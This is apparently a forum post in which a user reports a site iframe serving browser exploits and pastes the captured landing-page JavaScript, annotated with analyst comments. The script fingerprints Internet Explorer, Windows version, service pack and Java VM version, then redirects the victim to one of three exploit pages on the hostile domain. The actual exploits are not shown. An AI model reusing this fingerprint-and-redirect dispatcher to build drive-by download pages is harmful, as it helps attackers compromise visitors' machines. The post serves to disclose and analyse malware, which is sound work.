well
the iframe on wxw.dougansss.com/tgp/ is definitely serving exploits....
this is the exploit code....
wxw.dougansss.com/dar/loading.html
and it explains why I wasn't hit by it when I entered, it's only IE they target...
Code:
<IE:clientCaps ID="oClientCaps" />
<script type="text/javascript" language="JavaScript">
// Captured sample, kept verbatim for analysis. These two globals carry the
// outcome of the client fingerprinting performed further down the script.
// ExploitNumber: numeric branch chosen by the OS/JVM/IE checks (0 = none chosen).
var ExploitNumber=0;
// Bug_param: relative path appended to the base URL before the redirect.
// It stays empty when no branch matches, and the final check then skips the redirect.
var Bug_param="";
// Looks up the installed version of a component, identified by its component ID.
// It relies on the global oClientCaps, the element declared in the page markup
// as <IE:clientCaps ID="oClientCaps" />, so it only works where that element
// exposes isComponentInstalled/getComponentVersion (presumably IE's clientCaps
// behavior; the binding itself is not shown in this listing).
// CLSID: component ID string in "{...}" form.
// Returns: the version string split on "," (an array of strings) when the
// component is reported as installed, otherwise the numeric array [0,0,0,0].
// Callers compare elements with != and <, so they depend on loose coercion
// between those string and number forms.
function GetVersion(CLSID)
{
if (oClientCaps.isComponentInstalled(CLSID,"ComponentID"))
{return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
else
{return Array(0,0,0,0);}
}
// Maps a browser version string to a short Windows tag by substring match.
// IE_vers: the string to inspect (the caller passes navigator.appVersion).
// Returns: "95", "NT", "ME", "98", "2K", "XP" or "2K3". There is no final
// else, so any string that matches none of the patterns yields undefined, and
// the caller's switch then falls into its default branch.
// Defender note: everything here is derived from a client-supplied string, so
// the OS classification follows whatever the browser reports about itself.
function Get_Win_Version(IE_vers)
{
if (IE_vers.indexOf('Windows 95') != -1) return "95"
else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
else if (IE_vers.indexOf('Windows 98') != -1) return "98"
else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
}
// Landing-page dispatcher (captured sample, code left byte-identical).
// Flow: fingerprint the client (browser name, platform, Windows version,
// JVM and IE component versions, service-pack token), pick a branch number,
// translate it to a relative path, then navigate the window to base URL + path.
// Triage notes from the visible logic:
//  - Non-IE browsers and non-Win32 platforms never set Bug_param, so no redirect occurs.
//  - XP clients reporting "SP2" get ExploitNumber=4, which has no matching case
//    in the second switch, so they are not redirected either.
//  - In proxy or web logs, a fetch of this page followed by a request for one of
//    the e1/e2/e3 paths under the base URL shows which branch a client was given.
// Base URL that the selected relative path is appended to.
var CGI_Script="http://wxw.dougansss.com/dar/";
// Gate 1: only clients identifying as Internet Explorer continue.
if (navigator.appName=="Microsoft Internet Explorer")
{
var IEversion=navigator.appVersion;
var IEplatform=navigator.platform;
// Gate 2: only clients whose platform string contains "Win32" continue.
if (IEplatform.search("Win32") != -1)
{
var WinOS=Get_Win_Version(IEversion);
// FullVersion and PatchList are assigned without var, so they become implicit globals.
// appMinorVersion is split on ";" and scanned below for the literal token "SP2".
FullVersion=clientInformation.appMinorVersion;
PatchList=FullVersion.split(";");
// Component IDs queried through GetVersion; going by the variable names, the first
// is the Java VM component and the second is the Internet Explorer component.
var JVM_vers = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");
var IE_vers = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");
var XP_SP2_patched=0;
// Branch selection. The recurring test "JVM_vers[0]!=0 && JVM_vers[2]<3810" means:
// a JVM component is reported as installed and its third version field is below 3810.
// The fields are strings when the component is installed, so < coerces them to numbers.
switch (WinOS)
{
case "2K":
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM = 5.0.3810.0 or higher
{
// No old JVM: the choice depends on whether the IE major version is 6.
if (IE_vers[0]==6)
{ ExploitNumber=3; }
else
{ ExploitNumber=2; }
}
break;
case "2K3":
// Server 2003 is assigned branch 3 unconditionally.
ExploitNumber=3;
break;
case "XP":
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM = 5.0.3810.0 or higher
{
// Look for an exact "SP2" token among the appMinorVersion fields.
for (var i=0; i < PatchList.length; i++)
{
if (PatchList[i]=="SP2")
{ XP_SP2_patched=1; }
}
if (XP_SP2_patched==0)
{
ExploitNumber=3;
}
else
{
// Branch 4 has no case in the path switch below, so these clients get no redirect.
ExploitNumber=4;
}
}
break;
default:
// Reached for 95/NT/ME/98 and for an undefined WinOS (unrecognised version string).
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else
{ ExploitNumber=2; } // if JVM = 5.0.3810.0 or higher
break;
}
// launching exploit which number is depends on Windows and IE versions
// Translate the branch number into a path relative to CGI_Script.
switch (ExploitNumber)
{
case 1:
// 95, NT, ME, 98, 2k, XP
Bug_param=Bug_param+"e1/e1.html";
break;
case 2:
// 95, NT, ME, 98, 2k - if JVM = 5.0.3810.0 or higher
Bug_param=Bug_param+"e2/e2.html";
break;
case 3:
// 2k+IE6, 2K3, XP+SP1 - if JVM = 5.0.3810.0 or higher
Bug_param=Bug_param+"e3/e3.html";
break;
default:
// Branches 0 and 4 end up here: Bug_param stays empty.
break;
}
}
}
// The top-level navigation happens only when a path was selected above.
if (Bug_param != ''){
window.location=CGI_Script+Bug_param;
}
it's not like they are trying to hide that it's an exploit LOL